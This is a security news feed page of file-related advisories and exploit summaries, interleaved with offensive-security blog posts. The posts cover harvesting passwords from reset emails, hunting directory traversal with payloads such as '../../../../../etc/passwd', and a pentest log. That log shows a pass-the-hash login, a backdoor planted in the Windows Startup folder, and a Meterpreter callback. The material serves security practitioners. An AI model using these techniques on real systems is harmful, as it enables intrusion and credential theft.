1754 items tagged "file"
Packet Storm Security Advisories
Mandriva Linux Security Advisory 2012-078 - Multiple vulnerabilities have been found and corrected in imagemagick. A flaw was found in the way ImageMagick processed images with malformed Exchangeable image file format metadata. An attacker could create a specially-crafted image file that, when opened by a victim, would cause ImageMagick to crash or, potentially, execute arbitrary code. A denial of service flaw was found in the way ImageMagick processed images with malformed Exif metadata. An attacker could create a specially-crafted image file that, when opened by a victim, could cause ImageMagick to enter an infinite loop. Various other issues have also been addressed.
Packet Storm Security Recent Files
Mandriva Linux Security Advisory 2012-077 - Untrusted search path vulnerability in configure.c in ImageMagick before 6.6.5-5, when MAGICKCORE_INSTALLED_SUPPORT is defined, allows local users to gain privileges via a Trojan horse configuration file in the current working directory. A flaw was found in the way ImageMagick processed images with malformed Exchangeable image file format metadata. An attacker could create a specially-crafted image file that, when opened by a victim, would cause ImageMagick to crash or, potentially, execute arbitrary code. A denial of service flaw was found in the way ImageMagick processed images with malformed Exif metadata. An attacker could create a specially-crafted image file that, when opened by a victim, could cause ImageMagick to enter an infinite loop. Various other issues have also been addressed.
Packet Storm Security Recent Files
Red Hat Security Advisory 2012-0544-01 - ImageMagick is an image display and manipulation tool for the X Window System that can read and write multiple image formats. A flaw was found in the way ImageMagick processed images with malformed Exchangeable image file format metadata. An attacker could create a specially-crafted image file that, when opened by a victim, would cause ImageMagick to crash or, potentially, execute arbitrary code. A denial of service flaw was found in the way ImageMagick processed images with malformed Exif metadata. An attacker could create a specially-crafted image file that, when opened by a victim, could cause ImageMagick to enter an infinite loop.
Packet Storm Security Advisories
Red Hat Security Advisory 2012-0545-01 - ImageMagick is an image display and manipulation tool for the X Window System that can read and write multiple image formats. A flaw was found in the way ImageMagick processed images with malformed Exchangeable image file format metadata. An attacker could create a specially-crafted image file that, when opened by a victim, would cause ImageMagick to crash or, potentially, execute arbitrary code. A denial of service flaw was found in the way ImageMagick processed images with malformed Exif metadata. An attacker could create a specially-crafted image file that, when opened by a victim, could cause ImageMagick to enter an infinite loop.
Packet Storm Security Tools
Samhain is a file system integrity checker that can be used as a client/server application for centralized monitoring of networked hosts. Databases and configuration files can be stored on the server. Databases, logs, and config files can be signed for tamper resistance. In addition to forwarding reports to the log server via authenticated TCP/IP connections, several other logging facilities (e-mail, console, and syslog) are available. Tested on Linux, AIX, HP-UX, Unixware, Sun and Solaris.
Packet Storm Security Exploits
By creating a specially crafted WebDAV request that contains an external entity it is possible to read files from Liferay Portal version 6.0.5 CE. Proof of concept code included.
Packet Storm Security Exploits
This Metasploit module exploits a vulnerability found in V-CMS's inline image upload feature. The problem is due to the inline_image_upload.php file not checking the file type before saving it on the web server. This allows any malicious user to upload a script (such as PHP) without authentication, and then execute it with a GET request. The issue is fixed in 1.1 by checking the extension name. By default, 1.1 only allows jpg, jpeg, png, gif and bmp, but it is still possible to upload a PHP file under one of those extension names, which may still be leveraged in an attack.
Packet Storm Security Exploits
The Uniformed Services University of the Health Sciences (USU) suffers from a file inclusion vulnerability.
Packet Storm Security Exploits
CitrusDB version 2.4.1 suffers from local file inclusion and remote SQL injection vulnerabilities.
Packet Storm Security Exploits
This Metasploit module exploits a buffer overflow in Csound before 5.16.6. The overflow occurs when trying to import a malicious hetro file from tabular format. In order to achieve exploitation the user should import the malicious file through csound with a command like "csound -U het_import msf.csd file.het". This exploit doesn't work if the "het_import" command is used directly to convert the file.
Packet Storm Security Misc. Files
Uploadify version 3.0.0 suffers from a file existence disclosure vulnerability.
Packet Storm Security Misc. Files
phpPaleo version 4.8b156 suffers from a local file inclusion vulnerability. A vulnerability exists in index.php for language handling that allows for local file inclusion using a null-byte attack on the 'lang' GET parameter.
Packet Storm Security Exploits
Quest InTrust version 10.4.x suffers from ArDoc.dll ActiveX control remote file creation / overwrite vulnerabilities in the ReportTree and SimpleTree classes. Proof of concept code included.
Packet Storm Security Advisories
Mandriva Linux Security Advisory 2012-035 - Multiple out-of-bounds heap-based buffer read flaws and invalid pointer dereference flaws were found in the way file, the utility for determining file types, processed the header section of certain Composite Document Format files. A remote attacker could provide a specially-crafted CDF file which, once inspected by the file utility on the victim's system, would cause the file executable to crash. The updated packages for Mandriva Linux 2011 have been upgraded to version 5.11 and the packages for Mandriva Linux 2010.2 have been patched to correct these issues.
Carnal0wnage
In July I published an article on Abusing Password Resets. Some Ruby code was provided and it no longer works very well. Gmail has a limitation on POP3 message retrieval; long story short, you can only get around 250 emails. This is pretty annoying when you want to pull down thousands of password reset emails to analyze the plain-text passwords for entropy. So the solution is to use IMAP.
Here is that code:

Breakdown:
Lines 1-3 - Start the script in Ruby, require the necessary libs
Lines 6, 8 - Name the class, instantiate a placeholder for file (could have been done with an instance variable as well).
Lines 10-11 - Method invoked (def initialize) when the class is started, self.lfile is the location of the file we will store our emails in.
Lines 13, 18, 21 - Begin, Rescue, End code (mainly so we graciously handle errors)
Line 14 - Instantiate a connection string to Gmail's IMAP server, name it "imap".
Lines 16-17 - Provide creds and invoke the check_for_emails method
Lines 24, 33 - define the check_emails_method, take the imap object as input, and close "end" the method.
Lines 25-26 - Select the inbox as the folder to pilfer and then instantiate a msgs object which has the results of all messages that haven't been deleted.
Lines 27-32 - If "msgs" (Array) is empty, print a message saying so, otherwise print that we are grabbing emails and invoke the place_emails_into_files method with both the msgs and imap objects.
Lines 35, 44 - define the method (place_emails_into_file) and close it off.
Line 36 - Iterate thru the msgs array, creating a mid (message id) object.
Lines 37-38 - Fetch the message with the message id (mid) we have created and then chomp any extra space off the end.
Lines 39-41 - Open the emails.txt file in the inbox folder (you've hopefully created) and write the message body into it (appending, NOT overwriting).
Line 43 - Invoke the create_file_with_tokens method.
Lines 46, 56 - define the create_file_with_tokens method and then close it.
Lines 47-49 - Create a new file which will contain the string you are trying to extract (the password) and then open the 'inbox/emails.txt' file for reading. Finally, on line 49 start iterating thru each line of the read_file ('inbox/emails.txt').
Lines 50-51 - Match the string you are looking for; if the m object (result of the match) is of a MatchData type, then put that string (password) into the "tokens.txt" or new_file, file.
Lines 53-55 - Close both files and print that we are done.
This should be able to run in Ruby versions 1.8.7 and greater. Ensure that you put your username and password in place of the ones I've entered on line 16.
cktricky
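An added example, not cktricky's script: the extract step the post describes (the line-by-line match in create_file_with_tokens), run offline against constructed reset-email bodies in place of the IMAP fetch, plus the entropy measurement the post says the passwords are collected for. The regex and the sample bodies are assumptions and would have to be adapted to the real mail template.

```ruby
# Added example, not the post's own script. The Net::IMAP fetch is replaced by
# constructed email bodies so this runs offline; the regex is a hypothetical
# template and would have to match the real reset mail.

# Constructed sample bodies standing in for the text appended to inbox/emails.txt.
SAMPLE_EMAILS = [
  "Subject: Password reset\r\n\r\nYour new password is: Xk29sLq1\r\nThanks\r\n",
  "Subject: Password reset\r\n\r\nYour new password is: password1\r\n",
  "Subject: Newsletter\r\n\r\nNothing to see here\r\n",
  "Subject: Password reset\r\n\r\nYour new password is: Xk29sLq1\r\n"
].freeze

# Hypothetical match for this mail template (the post's m = line.match(...) step).
RESET_PATTERN = /\AYour new password is: (\S+)\z/

# Equivalent of create_file_with_tokens working on in-memory text: walk every
# line and keep the captured token whenever the line matches.
def extract_tokens(bodies, pattern = RESET_PATTERN)
  bodies.flat_map do |body|
    body.each_line.filter_map do |line|
      m = line.chomp.match(pattern)   # chomp, as the post does, before matching
      m && m[1]
    end
  end
end

# Shannon entropy in bits per character of one string.
def shannon_entropy(str)
  return 0.0 if str.empty?
  n = str.length.to_f
  str.each_char.tally.values.sum { |c| p = c / n; -p * Math.log2(p) }
end

# What the post collects the tokens for: do the generated passwords look
# random, and do they repeat across resets?
def analyze_tokens(tokens)
  return nil if tokens.empty?
  {
    count: tokens.size,
    unique: tokens.uniq.size,
    charset: tokens.join.chars.uniq.size,
    min_bits_per_char: tokens.map { |t| shannon_entropy(t) }.min,
    avg_length: tokens.sum(&:length).fdiv(tokens.size)
  }
end

if __FILE__ == $PROGRAM_NAME
  p analyze_tokens(extract_tokens(SAMPLE_EMAILS))
end
```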
-
-
22:23
»
Packet Storm Security Recent Files
Samhain is a file system integrity checker that can be used as a client/server application for centralized monitoring of networked hosts. Databases and configuration files can be stored on the server. Databases, logs, and config files can be signed for tamper resistance. In addition to forwarding reports to the log server via authenticated TCP/IP connections, several other logging facilities (e-mail, console, and syslog) are available. Tested on Linux, AIX, HP-UX, Unixware, Sun and Solaris.
-
20:17
»
Packet Storm Security Advisories
Onapsis Security Advisory - If a specially crafted packet is sent to the JDENet Service (6015 TCP by default), and the JDESAW Kernel is configured (it is by default), then it would be possible to read any file on the system.
-
20:06
»
Packet Storm Security Advisories
Onapsis Security Advisory - If a "Message packet" is sent to the JDENet port (6015 by default) containing a specially crafted "File Packet", the sent file is saved in the server where the JDENet service is running, in the arbitrary location specified by the "File Packet".
-
-
7:40
»
Packet Storm Security Advisories
Red Hat Security Advisory 2012-0310-03 - The nfs-utils package provides a daemon for the kernel Network File System server, and related tools such as the mount.nfs, umount.nfs, and showmount programs. It was found that the mount.nfs tool did not handle certain errors correctly when updating the mtab file. A local attacker could use this flaw to corrupt the mtab file.
-
7:28
»
Packet Storm Security Advisories
Red Hat Security Advisory 2012-0307-03 - The util-linux package contains a large variety of low-level system utilities that are necessary for a Linux system to function. Among others, util-linux contains the fdisk configuration tool and the login program. Multiple flaws were found in the way the mount and umount commands performed mtab file updates. A local, unprivileged user allowed to mount or unmount file systems could use these flaws to corrupt the mtab file and create a stale lock file, preventing other users from mounting and unmounting file systems.
-
-
11:01
»
Carnal0wnage
In cktricky's last post he provided a great outline on the ins and outs of leveraging burp's built in support for directory traversal testing. There are two questions, however, that should immediately come to mind once you are familiar with this tool: How do I find directory traversal & what should I look for if I do?
Finding directory traversal is the hunt for dynamic file retrieval or modification. The antonym, static file retrieval, is when the browser is delegated the request for a file on the server. In other words, every <a href>, css call for a file/location, and even most JavaScript calls can be considered static. You could copy the path of those requests into the browser address bar and grab the file yourself, because that is pretty much what the browser is doing for you. Dynamic file retrieval, however, is when you request a server based page/function which serves you a file. Think of it as the difference between calling someone directly on the phone vs. calling an operator who calls that person and patches you in.
Dynamic file serving takes place for a variety of reasons, such as: user content download locations, dynamic image rendering/resizing features, template engines, language parameters*, AJAX to services type calls, sometimes in cookies, and occasionally are how pages themselves get served. These all basically look something like:
somefunction.php?img=/some/place/graphic.jpg
or
somefunction.php?page=/view/something
The path to the file can either be relative (../../../etc) or in some more rare cases absolute (c:/windows/boot.ini). Additionally, these requests might be base64 or ROT13 encoded or sometimes encrypted. Neither is a stopgap.
You might think language parameters are an odd location for directory traversal, but after talking with my co-workers*, they reminded me about dynamic file modification. Some frameworks use parameters (such as language) to prefix a directory to the request or alter the file name for the appropriate language. Ergo:
cookie: language=en-us;
could turn into:
File.Open('/' + language + '/' + some-file);
File.Open('/' + language + '.' + some-file);
If that is true, you can alter the root of a request, then use terminators to kill off the rest of what gets appended (null chars ftw) such as:
cookie: language=../../../../../etc/passwd
cookie: language=../../../../../etc/passwd;
Language, template/skin name, or occasionally environment type variables (such as location=PROD, DEBUG, etc...). Anything that might be prefixed to a file name or directory to search is fair-game for that.
Now what? Once you've identified a location which appears to be ripe for the testing, how do you verify and what would you do? To verify, I have found two approaches that work well: default files & known files.
The first approach is based on looking for default files on the file system. Since you are mostly blind to what exists on a server, you look for the existence of these defaults to see if they can be retrieved. There are two resources which I've found helpful. The first is Mubix's list of post-exploitation commands. In addition to a helpful list of commands for post exploit, the list includes very common files you might want to look for and steal (by operating system). The second resource is the Apache Default layout per OS. This can be really useful if you are attacking a system using Apache, to grab known configurations. For non-Apache web servers, I usually install them locally and see what the default layout looks like manually.
The second approach comes into play if the first fails (and it might) because the user-context of the site doesn't have the authority to access those files. So you have to request files you can be reasonably sure it has access to: the webpages it already serves. In this approach you attempt to serve other parts of the webpage, relative to the location you are currently looking at. As a contrived example, say you see a layout something like:
/mainpage.asp
/vulnerableFeature.asp?path=/images/some-image.jpg
you'd test for:
/vulnerableFeature.asp?path=../mainpage.asp
/vulnerableFeature.asp?path=/mainpage.asp
Since you know that the user-context of the site has the authority to serve those pages, it -should- be a fairly practical way to verify if your directory traversal is working. You may even get back source code this way. :-)
If you are attempting to take over the server, you should be looking to steal resources which would help you with that (such as the passwd & sam files). If you are attempting to do an involuntary code review, you should steal the source code from the pages you are looking at. There are occasionally hard-coded credentials in source, but application configuration files are often gold for credentials. I've found database, admin users, SMTP credentials and FTP users this way.
Some final things to consider:
- Most operating systems support the use of environment variables/shortcuts for locations such as %home% or ~. This is useful to remember if there are protections against using a period or two successive periods.
- When dynamic features serve files, they often violate other protections. In IIS for instance various extensions cannot be served by the server (.config files for instance). However in most directory traversals you can pull the web.config file out w/o many problems.
- User controlled uploads often get served dynamically because there isn't a way for the server to know before-hand what the files are. You can sometimes find directory traversal here by uploading files with weird paths in their names (or renaming them after upload).
- Developers sometimes leave clues to file's physical locations in comments. I once downloaded a source for an entire site because of this.
- Image / gallery plugins for CMSs are notorious for directory traversal.
- Error messages are your friend here. If you get a system/application error instead of a file not found type error, you can at least use the mechanism to check for existence of files.
Happy Hunting.
-kuzushi
* Thanks DC & AJ
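An added example, not code from kuzushi's post: the "prefix a user value onto a file name" pattern the post describes, written in Ruby, beside a hardened resolver that rejects the relative traversal, absolute path, null terminator and ~ shortcut cases the post lists. The base directories and the language allowlist are assumptions.

```ruby
# Added example, not code from the original post. Paths and the language list
# below are assumptions chosen to illustrate the post's "prefix a user value
# onto a file name" pattern and one way to harden it.

# Vulnerable shape from the post: File.Open('/' + language + '/' + some-file).
# File.join does not normalise, so "../../etc" walks straight out of base.
def unsafe_language_path(base, language, file)
  File.join(base, language, file)
end

# Hardened resolver: resolve the candidate relative to base, then accept it only
# if the normalised result still lies inside base. Symlinks inside base would
# additionally need a realpath check once the file is known to exist.
def resolve_under_base(base, user_path)
  return nil if user_path.nil? || user_path.empty?
  # The post's null-terminator trick; File.expand_path would also raise on "\0".
  return nil if user_path.include?("\0")
  # File.expand_path expands "~" and "~user" to home directories, which is the
  # %home%/~ shortcut the post warns about, so refuse those outright.
  return nil if user_path.start_with?("~")

  base_abs  = File.expand_path(base)
  # Collapses ../ segments; an absolute user path simply replaces base here,
  # which is exactly why the prefix check below is needed.
  candidate = File.expand_path(user_path, base_abs)
  # Compare against base plus a separator so /srv/app/images does not
  # accept /srv/app/images_private.
  prefix = base_abs.end_with?(File::SEPARATOR) ? base_abs : base_abs + File::SEPARATOR
  candidate.start_with?(prefix) ? candidate : nil
end

# For values the post calls prefixes (language, skin, environment), an allowlist
# is the simpler control; the resolver stays as a second line of defence.
ALLOWED_LANGUAGES = %w[en-us de-de fr-fr].freeze

def language_file(base, language, file)
  return nil unless ALLOWED_LANGUAGES.include?(language)
  resolve_under_base(base, File.join(language, file))
end

if __FILE__ == $PROGRAM_NAME
  base = "/srv/app/pages"
  puts unsafe_language_path(base, "../../etc", "passwd")                # escapes base
  p resolve_under_base("/srv/app/images", "../../../../../etc/passwd")  # nil
  p language_file(base, "en-us", "index.html")                          # /srv/app/pages/en-us/index.html
end
```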
-
13:48
»
Packet Storm Security Advisories
Zero Day Initiative Advisory 12-027 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of IBM SPSS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the SaveDoc function exposed by the VsVIEW6.ocx ActiveX control. The SaveDoc function causes a file to be created at an arbitrary path specified by the first argument (FileName). The file contents can be controlled by first setting the 'Text' member of the object. These behaviors can be exploited by a remote attacker to execute arbitrary code on the target system.
-
13:38
»
Packet Storm Security Recent Files
Zero Day Initiative Advisory 12-026 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of IBM SPSS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the Render() method exposed by the ExportHTML.dll ActiveX control. This method causes a file to be written to an arbitrary path specified by the second argument (Output). The contents of the file can be controlled by manipulating the object members 'CssLocation', 'LayoutStyle' and 'EmbedCss'. The CssLocation member can be directed to a UNC path containing a file to be included in the file generated by the call to Render(). These behaviors can be exploited by an attacker to execute arbitrary code on the target system.
-
15:53
»
Packet Storm Security Misc. Files
Cyberoam Central Console version 2.00.2 suffers from a local file inclusion vulnerability.
-
15:12
»
Packet Storm Security Misc. Files
afick is another file integrity checker, designed to be fast and fully portable between Unix and Windows platforms. It works by first creating a database that represents a snapshot of the most essential parts of your computer system. Then a user can run the script to discover all modifications made since the snapshot was taken (i.e. files added, changed, or removed). The configuration syntax is very close to that of aide or tripwire, and a graphical interface is provided.
-
-
21:23
»
Packet Storm Security Advisories
Zero Day Initiative Advisory 12-020 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of IBM SPSS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the SaveDoc and PrintFile functions exposed by the VsVIEW6.ocx ActiveX control. The SaveDoc function causes a file to be created at an arbitrary path specified by the first argument (FileName). The file contents can be controlled by setting the 'Header' member and calling PrintFile() with the same path argument. These behaviors can be exploited by a remote attacker to execute arbitrary code on the target system.
-
-
11:28
»
Carnal0wnage
I ended up having to use the
smb/upload_file module on a pentest. I was able to get the local admin hashes but for some reason the psexec module wouldn't get code execution, it would act like it would work but wasn't. So we decided to push a binary, use
winexe that was modified to pass the hash to exec the binary as needed. It went something like this...
##################################################
# add a route to the 10.x network thru session 1
##################################################
msf exploit(handler) > route add 10.0.0.0 255.255.255.0 1
[*] Route added
#######################################################
# psexec wouldnt work. AV eating metsvc most likely...
# used smb/upload_file to place a binary on the box
######################################################
msf exploit(handler) > use auxiliary/admin/smb/upload_file
msf auxiliary(upload_file) > info
Name: SMB File Upload Utility
Module: auxiliary/admin/smb/upload_file
Version: 10394
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
hdm
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LPATH yes The path of the local file to upload
RHOST yes The target address
RPATH yes The name of the remote file relative to the share
RPORT 445 yes Set the SMB service port
SMBSHARE C$ yes The name of a writeable share on the server
Description:
This module uploads a file to a target share and path. The only
reason to use this module is if your existing SMB client is not able
to support the features of the Metasploit Framework that you need,
like pass-the-hash authentication.
msf auxiliary(upload_file) > set SMBUser Administrator
SMBUser => Administrator
smsf auxiliary(upload_file) > set SMBPass aad3b435b51404eeaad3b435b51404ee:9eba97a1375911112222333398c61606
SMBPass => aad3b435b51404eeaad3b435b51404ee:9eba97a1375911112222333398c61606
msf auxiliary(upload_file) > set RHOST 1.2.3.4
RHOST => 1.2.3.4
msf auxiliary(upload_file) > set LPATH /home/chris/msf3/msf_backdoor.exe
LPATH => /home/chris/msf3/msf_backdoor.exe
msf auxiliary(upload_file) > set RPATH "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\msf_backdoor.exe"
RPATH => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\msf_backdoor.exe
msf auxiliary(upload_file) > run
[*] Read 13616 bytes from /home/chris/msf3/msf_backdoor.exe...
[*] Connecting to the server...
[*] Mounting the remote share \\1.2.3.4\C$'...
[*] Trying to upload Documents and Settings\All Users\Start Menu\Programs\Startup\msf_backdoor.exe...
[*] The file has been uploaded to Documents and Settings\All Users\Start Menu\Programs\Startup\msf_backdoor.exe...
[*] Auxiliary module execution completed
################################################
#Set up a portforward to talk to hosts via SMB
################################################
meterpreter > portfwd add -l 445 -p 445 -r 1.2.3.4
[*] Local TCP relay created: 0.0.0.0:445 <-> 1.2.3.4:445
#####################################################################
# Use winexe with pass the hash to get cmd shell and run the binary
#####################################################################
user@ubuntu:~/Desktop/winexe-hash$ export SMBHASH=aad3b435b51404eeaad3b435b51404ee:9eba97a1375911112222333398c61606
user@ubuntu:~/Desktop/winexe-hash$ ./winexe -U administrator //1.2.3.4 "cmd"
Password for [WORKGROUP\administrator]:
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : inside.company.com
IP Address. . . . . . . . . . . . : 1.2.3.4
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 1.2.3.254
C:\WINDOWS\system32>
C:\Documents and Settings\All Users\Start Menu\Programs\Startup>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0007-B088
Directory of C:\Documents and Settings\All Users\Start Menu\Programs\Startup
01/13/2012 03:55 PM .
01/13/2012 03:55 PM ..
01/13/2012 03:55 PM 13,616 msf_backdoor.exe
1 File(s) 13,616 bytes
2 Dir(s) 241,661,345,792 bytes free
C:\Documents and Settings\All Users\Start Menu\Programs\Startup>msf_backdoor.exe
msf_backdoor.exe
C:\Documents and Settings\All Users\Start Menu\Programs\Startup>
[*] 5.5.5.5:4889 Request received for /INITM...
[*] 5.5.5.5:4889 Staging connection for target /INITM received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 5 opened (5.5.5.5:443 -> 6.6.6.6:4889) at Wed Jan 18 22:02:03 +0000 2012
-
-
18:08
»
Packet Storm Security Recent Files
The Mandos system allows computers to have encrypted root file systems and at the same time be capable of remote or unattended reboots. The computers run a small client program in the initial RAM disk environment which will communicate with a server over a network. All network communication is encrypted using TLS. The clients are identified by the server using an OpenPGP key that is unique to each client. The server sends the clients an encrypted password. The encrypted password is decrypted by the clients using the same OpenPGP key, and the password is then used to unlock the root file system.
-
17:35
»
Packet Storm Security Exploits
phpMyAdmin versions 3.3.x and 3.4.x suffer from a local file inclusion vulnerability via XXE injection. The attacker must be logged in to MySQL via phpMyAdmin.
-
-
18:34
»
Packet Storm Security Recent Files
Mandriva Linux Security Advisory 2012-004 - Multiple vulnerabilities have been found and corrected in t1lib. A heap-based buffer overflow flaw was found in the way the AFM font file parser, used for rendering of DVI files in the GNOME evince document viewer and other products, processed line tokens from the given input stream. A remote attacker could provide a DVI file with an embedded specially crafted font file and trick the local user into opening it with an application using the AFM font parser, leading to a crash of that application or, potentially, arbitrary code execution with the privileges of the user running the application. Various other issues were also addressed.